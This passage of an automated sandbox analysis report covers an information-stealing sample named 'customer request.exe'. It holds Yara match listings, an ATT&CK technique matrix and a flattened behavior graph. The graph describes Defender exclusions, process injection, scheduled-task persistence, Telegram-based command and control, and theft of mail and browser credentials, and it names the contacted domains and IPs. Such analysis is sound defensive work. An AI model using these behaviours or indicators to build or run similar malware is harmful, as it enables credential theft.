            Source: Yara matchFile source: 10.2.tjvxuavKFXO.exe.4c7bbe8.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.tjvxuavKFXO.exe.4b999b0.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.tjvxuavKFXO.exe.4c7bbe8.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.customer request.exe.4d3e188.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.customer request.exe.4d1d568.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000A.00000002.1763910283.0000000004B99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.4133955446.000000000041C000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1722509797.0000000004D1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.1763910283.0000000004C7B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: customer request.exe PID: 6848, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: customer request.exe PID: 1908, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: tjvxuavKFXO.exe PID: 7348, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: tjvxuavKFXO.exe PID: 7488, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 10.2.tjvxuavKFXO.exe.4b999b0.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.customer request.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.customer request.exe.4d3e188.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.customer request.exe.4d1d568.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.tjvxuavKFXO.exe.4c7bbe8.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.tjvxuavKFXO.exe.4b999b0.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.tjvxuavKFXO.exe.4c7bbe8.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.customer request.exe.4d3e188.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.customer request.exe.4d1d568.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000008.00000002.4137608364.0000000002DAC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4133954704.000000000041B000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.1763910283.0000000004B99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.4137995845.0000000002F02000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.4137995845.0000000002F38000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.4137995845.0000000002E74000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4137608364.0000000002E3C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1722509797.0000000004D1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.4133955446.000000000041A000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.1763910283.0000000004C7B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4137608364.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4137608364.0000000002E72000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.4137995845.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: customer request.exe PID: 6848, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: customer request.exe PID: 1908, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: tjvxuavKFXO.exe PID: 7348, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: tjvxuavKFXO.exe PID: 7488, type: MEMORYSTR
            Source: Yara matchFile source: 0000000D.00000002.4137995845.0000000002F38000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4137608364.0000000002E72000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: customer request.exe PID: 1908, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: tjvxuavKFXO.exe PID: 7488, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Scheduled Task/Job
            1
            DLL Side-Loading
            1
            DLL Side-Loading
            11
            Disable or Modify Tools
            1
            OS Credential Dumping
            1
            File and Directory Discovery
            Remote Services11
            Archive Collected Data
            1
            Web Service
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/Job1
            Scheduled Task/Job
            111
            Process Injection
            1
            Deobfuscate/Decode Files or Information
            1
            Input Capture
            13
            System Information Discovery
            Remote Desktop Protocol1
            Data from Local System
            1
            Ingress Tool Transfer
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            Scheduled Task/Job
            31
            Obfuscated Files or Information
            Security Account Manager1
            Query Registry
            SMB/Windows Admin Shares1
            Email Collection
            11
            Encrypted Channel
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
            Software Packing
            NTDS11
            Security Software Discovery
            Distributed Component Object Model1
            Input Capture
            3
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            DLL Side-Loading
            LSA Secrets1
            Process Discovery
            SSHKeylogging14
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Masquerading
            Cached Domain Credentials31
            Virtualization/Sandbox Evasion
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
            Virtualization/Sandbox Evasion
            DCSync1
            Application Window Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job111
            Process Injection
            Proc Filesystem1
            System Network Configuration Discovery
            Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1618311 Sample: customer request.exe Startdate: 18/02/2025 Architecture: WINDOWS Score: 100 52 reallyfreegeoip.org 2->52 54 api.telegram.org 2->54 56 2 other IPs or domains 2->56 58 Suricata IDS alerts for network traffic 2->58 60 Found malware configuration 2->60 62 Malicious sample detected (through community Yara rule) 2->62 68 12 other signatures 2->68 8 customer request.exe 7 2->8         started        12 tjvxuavKFXO.exe 2->12         started        signatures3 64 Tries to detect the country of the analysis system (by using the IP) 52->64 66 Uses the Telegram API (likely for C&C communication) 54->66 process4 file5 38 C:\Users\user\AppData\...\tjvxuavKFXO.exe, PE32 8->38 dropped 40 C:\Users\...\tjvxuavKFXO.exe:Zone.Identifier, ASCII 8->40 dropped 42 C:\Users\user\AppData\Local\...\tmp6BAE.tmp, XML 8->42 dropped 44 C:\Users\user\...\customer request.exe.log, ASCII 8->44 dropped 70 Adds a directory exclusion to Windows Defender 8->70 72 Injects a PE file into a foreign processes 8->72 14 powershell.exe 23 8->14         started        17 customer request.exe 15 2 8->17         started        20 powershell.exe 23 8->20         started        22 schtasks.exe 1 8->22         started        74 Multi AV Scanner detection for dropped file 12->74 24 tjvxuavKFXO.exe 12->24         started        26 schtasks.exe 12->26         started        signatures6 process7 dnsIp8 76 Loading BitLocker PowerShell Module 14->76 28 conhost.exe 14->28         started        30 WmiPrvSE.exe 14->30         started        46 api.telegram.org 149.154.167.220, 443, 62946, 62955 TELEGRAMRU United Kingdom 17->46 48 checkip.dyndns.com 193.122.6.168, 49736, 49741, 49742 ORACLE-BMC-31898US United States 17->48 50 reallyfreegeoip.org 104.21.16.1, 443, 49737, 49739 CLOUDFLARENETUS United States 17->50 32 conhost.exe 20->32         started        34 conhost.exe 22->34         started        78 Tries to steal Mail credentials (via file / registry access) 24->78 80 Tries to harvest and steal browser information (history, passwords, etc) 24->80 36 conhost.exe 26->36         started        signatures9 process10

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.